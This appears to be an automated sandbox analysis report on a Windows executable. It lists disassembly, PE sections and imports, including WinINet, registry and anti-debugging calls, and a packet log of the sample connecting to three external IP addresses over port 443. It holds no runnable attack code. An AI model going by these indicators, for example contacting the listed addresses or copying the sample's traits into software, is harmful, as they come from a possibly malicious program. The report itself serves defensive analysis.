                                                                                                                  div esi
                                                                                                                  dec esp
                                                                                                                  cmp ecx, eax
                                                                                                                  jbe 00007F8A6CAEAA5Ah
                                                                                                                  dec eax
                                                                                                                  cmp ebp, FFFFFFFFh
                                                                                                                  je 00007F8A6CAEAA41h
                                                                                                                  dec esp
                                                                                                                  mov eax, ebp
                                                                                                                  xor edx, edx
                                                                                                                  call 00007F8A6CAF54EFh
                                                                                                                  Programming Language:
                                                                                                                  • [C++] VS2013 UPD4 build 31101
                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                  • [ C ] VS2005 build 50727
                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                  • [LNK] VS2013 UPD4 build 31101
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x173dd80xc8.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1950000x37f25.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1860000xee20.pdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1c58000x18c8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cd0000x2124.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x14e2100x70.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1240000x660.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x122dbe0x122e00False0.5247426608831113data6.488153775731966IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x1240000x5136e0x51400False0.3829657451923077PPMN archive data5.1890033884633375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x1760000xf3800x8000False0.1807861328125data4.053578134204861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .pdata0x1860000xee200xf000False0.48118489583333335data6.115908036844608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x1950000x37f250x38000False0.10564749581473214data2.904259434911361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x1cd0000x21240x2200False0.30514705882352944data5.424574392360352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0x1951780x37828Device independent bitmap graphic, 215 x 512 x 32, image size 220160, resolution 11811 x 11811 px/m0.10288607015938918
                                                                                                                  RT_STRING0x1cc9a00x2adataEnglishUnited States0.5952380952380952
                                                                                                                  RT_GROUP_ICON0x1cc9cc0x14data1.2
                                                                                                                  RT_VERSION0x1cc9e00x3c8dataEnglishUnited States0.4121900826446281
                                                                                                                  RT_MANIFEST0x1ccda80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                  DLLImport
                                                                                                                  SHLWAPI.dllPathFileExistsW, PathFindFileNameW, PathRemoveFileSpecW, PathIsDirectoryW, PathRemoveExtensionW, PathIsFileSpecW, PathAddExtensionW, PathAppendW, PathRenameExtensionW
                                                                                                                  WININET.dllInternetSetOptionA, InternetOpenW, InternetQueryOptionW, InternetQueryDataAvailable, InternetCrackUrlW, InternetCloseHandle, HttpOpenRequestW, HttpQueryInfoW, InternetReadFile, InternetSetOptionW, HttpSendRequestW, InternetSetStatusCallbackW, InternetConnectW
                                                                                                                  SETUPAPI.dllSetupDiEnumDeviceInfo, SetupDiGetDeviceInstanceIdW, SetupDiDestroyDeviceInfoList, SetupDiGetClassDevsW, SetupDiGetDeviceRegistryPropertyW, CM_Get_DevNode_Status
                                                                                                                  KERNEL32.dllMoveFileExW, CompareFileTime, GetEnvironmentStringsW, LoadLibraryW, CopyFileW, GetVersionExW, CreateFileW, GetProcAddress, GetDiskFreeSpaceW, FindClose, FreeEnvironmentStringsW, FindNextFileW, GetFileTime, GetFileAttributesExW, CloseHandle, FileTimeToLocalFileTime, DeleteFileW, GetLastError, ReadFile, GetModuleFileNameW, HeapReAlloc, HeapAlloc, HeapFree, GetProcessHeap, Sleep, HeapDestroy, InitializeCriticalSectionEx, RaiseException, HeapSize, DecodePointer, DeleteCriticalSection, lstrlenW, WaitForSingleObject, CreateMutexA, ReleaseMutex, InitializeCriticalSectionAndSpinCount, GetFileSize, CreateMutexW, SystemTimeToFileTime, GetCurrentProcess, GetModuleHandleW, WriteFile, GetFileAttributesW, FlushFileBuffers, GetTempPathW, SetLastError, FindFirstFileW, LocalFree, GetSystemTime, SetFileAttributesW, CreateDirectoryW, GetFullPathNameW, GetFullPathNameA, CreateFileA, HeapCompact, SetFilePointer, MapViewOfFile, UnmapViewOfFile, SetEndOfFile, QueryPerformanceCounter, UnlockFile, LockFile, OutputDebugStringW, GetTickCount, UnlockFileEx, GetSystemTimeAsFileTime, FormatMessageA, InitializeCriticalSection, FormatMessageW, LeaveCriticalSection, GetFileAttributesA, HeapCreate, HeapValidate, LockFileEx, EnterCriticalSection, LoadLibraryA, CreateFileMappingA, CreateFileMappingW, GetDiskFreeSpaceA, GetSystemInfo, OutputDebugStringA, GetVersionExA, GetCurrentProcessId, GetTempPathA, AreFileApisANSI, DeleteFileA, ReleaseSemaphore, ExitProcess, GetCurrentThreadId, GetDateFormatW, GetTimeFormatW, GetFileSizeEx, GetLocalTime, OpenMutexW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, MultiByteToWideChar, GetACP, WideCharToMultiByte, EnumSystemLocalesW, GetStdHandle, SetFilePointerEx, GetConsoleCP, GetConsoleMode, FreeLibrary, IsValidCodePage, GetOEMCP, SetStdHandle, ReadConsoleW, LoadLibraryExW, GetModuleFileNameA, WriteConsoleW, SetEnvironmentVariableA, LCMapStringA, GetStringTypeExA, lstrlenA, SetConsoleCtrlHandler, GetFileType, GetCPInfo, EncodePointer, CreateSemaphoreW, LCMapStringW, CompareStringW, GetStartupInfoW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlCaptureContext, GetTimeZoneInformation, RtlUnwindEx, RtlLookupFunctionEntry, RtlPcToFileHeader, GetModuleHandleExW, IsDebuggerPresent, IsProcessorFeaturePresent, GetCommandLineA, GetStringTypeW
                                                                                                                  USER32.dllLoadStringA, wsprintfW
                                                                                                                  ADVAPI32.dllRegSetValueExW, RegCloseKey, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, GetUserNameW
                                                                                                                  SHELL32.dllSHGetFolderPathW, SHFileOperationW, SHGetSpecialFolderPathW, SHCreateDirectoryExW
                                                                                                                  ole32.dllCoInitialize, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize, CoTaskMemFree, CoCreateInstance, CoInitializeEx
                                                                                                                  OLEAUT32.dllSysStringLen, SysFreeString, VariantClear, SysAllocString, SysAllocStringByteLen
                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Aug 29, 2023 19:16:40.482439041 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.482542038 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.482665062 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.490227938 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.490294933 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.554061890 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.554236889 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.557308912 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.557344913 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.557687044 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.602087021 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.817735910 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.854195118 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.854262114 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.854353905 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.854559898 CEST49710443192.168.2.4104.26.8.237
                                                                                                                  Aug 29, 2023 19:16:40.854584932 CEST44349710104.26.8.237192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.898688078 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:40.898766994 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.898863077 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:40.900680065 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:40.900727987 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.947583914 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.947767019 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:40.969974041 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:40.970011950 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.970555067 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.972981930 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:41.015489101 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.592787981 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.592829943 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.592976093 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.592978001 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:41.593049049 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:41.593898058 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:41.593920946 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.593940973 CEST49711443192.168.2.418.165.183.85
                                                                                                                  Aug 29, 2023 19:16:41.593950033 CEST4434971118.165.183.85192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.643307924 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.643387079 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.643502951 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.644315958 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.644347906 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.714797020 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.715065956 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.718314886 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.718352079 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.718947887 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.721256018 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.753082037 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.753145933 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.753371000 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.753403902 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.753474951 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.755696058 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.755872011 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.759315014 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.759497881 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.761087894 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.761324883 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.807924986 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808034897 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808113098 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808130980 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808136940 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808151960 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808207035 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808227062 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808278084 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808291912 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808340073 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808362961 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808407068 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808432102 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808475018 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808490038 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808533907 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808548927 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808593988 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808603048 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808615923 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.808644056 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.808675051 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.809679985 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.809768915 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.811537027 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.811628103 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.815182924 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.815279007 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.816916943 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.817003012 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.820422888 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.820538998 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.862721920 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.862801075 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.862863064 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.862921000 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.862977982 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863032103 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863076925 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863130093 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863164902 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863229990 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863241911 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863276958 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863293886 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863312960 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863349915 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863441944 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863446951 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863488913 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863553047 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863555908 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863612890 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863624096 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863635063 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863681078 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863714933 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863737106 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863790989 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863790989 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863809109 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863867044 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863893032 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.863903999 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863924980 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.863961935 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.864028931 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.864037991 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.864399910 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.865097046 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.865238905 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.865964890 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.866108894 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.885359049 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.885474920 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.885548115 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.885593891 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.885615110 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.888411045 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.888550043 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.888572931 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.888648987 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.888698101 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.888753891 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.888781071 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.888791084 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.888820887 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.888866901 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.889715910 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.889806032 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.890574932 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.890664101 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.890677929 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.890690088 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.890722036 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.891535997 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.891622066 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.891639948 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.891690016 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.892416954 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.892472029 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.892517090 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.892539024 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.892571926 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.892585039 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.893313885 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.893399954 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.894228935 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.894303083 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.894309998 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.894329071 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.894355059 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.895188093 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.895268917 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.895291090 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.895343065 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.896127939 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.896193027 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.896244049 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.896262884 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.896296024 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.896326065 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.897128105 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.897221088 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.897725105 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.897810936 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.897818089 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.897842884 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.897883892 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.898713112 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.898803949 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.898823023 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.898885012 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.911137104 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.911251068 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.911375046 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.911411047 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.911448956 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.911540985 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.911544085 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.911569118 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.911614895 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.912302017 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.912380934 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.912400007 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.912412882 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.912472963 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.914041996 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.914113998 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.914165020 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.914180994 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.914200068 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.914491892 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.914589882 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.914601088 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.914657116 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.915206909 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.915318012 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:41.916163921 CEST44349712162.19.58.158192.168.2.4
